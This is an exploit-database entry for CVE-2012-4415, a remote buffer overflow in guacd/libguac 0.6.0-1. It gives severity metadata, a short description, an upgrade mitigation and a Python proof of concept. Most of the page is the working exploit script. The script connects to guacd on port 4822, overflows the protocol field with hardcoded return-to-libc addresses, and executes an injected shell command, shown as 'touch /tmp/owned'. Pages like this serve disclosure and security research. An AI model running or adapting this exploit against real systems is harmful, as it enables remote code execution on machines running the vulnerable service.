header-logo
Suggest Exploit
vendor:
libguac
by:
Timo Juhani Lindfors
7,5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: libguac
Affected Version From: 0.6.0-1
Affected Version To: 0.6.0-1
Patch Exists: YES
Related CWE: CVE-2012-4415
CPE: a:guacamole:libguac
Metasploit: https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2014-0148/
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Debian i386
2012

libguac Remote Buffer-Overflow Vulnerability

libguac is prone to a remote buffer-overflow vulnerability. Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. The proof-of-concept code provided allows arbitrary code execution on Debian i386 guacd 0.6.0-1 with default configuration. It uses return-to-libc to bypass non-executable stack.

Mitigation:

Upgrade to the latest version of libguac
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/55497/info

libguac is prone to a remote buffer-overflow vulnerability.

Attackers can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in denial-of-service conditions. 

#!/usr/bin/python
# CVE-2012-4415: PoC for guacd buffer overflow vulnerability # # Copyright (c) 2012 Timo Juhani Lindfors <timo.lindfors@iki.fi> # # Allows arbitrary code execution on Debian i386 guacd 0.6.0-1 with # default configuration. Uses return-to-libc to bypass non-executable # stack.
#
import socket, struct
PROTOCOL_ADDRESS = 0xbf807e9f
SYSTEM_ADDRESS = 0xb76e7640
class GuacdPOC:
    def __init__(self, command):
        self.sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.sock.connect(('localhost', 4822))
        self.s("select")
        self.c(",")
        protocol = (command + "; " + "#" * 265)[:265]
        protocol += struct.pack("L", PROTOCOL_ADDRESS)
        protocol += struct.pack("L", SYSTEM_ADDRESS)
        self.s(protocol)
        self.c(";")
    def s(self, x):
        self.sock.send("%d.%s" % (len(x), x))
    def c(self, x):
        self.sock.send(x)
GuacdPOC("touch /tmp/owned")

Navigation

Suggest Exploit

Services By CQR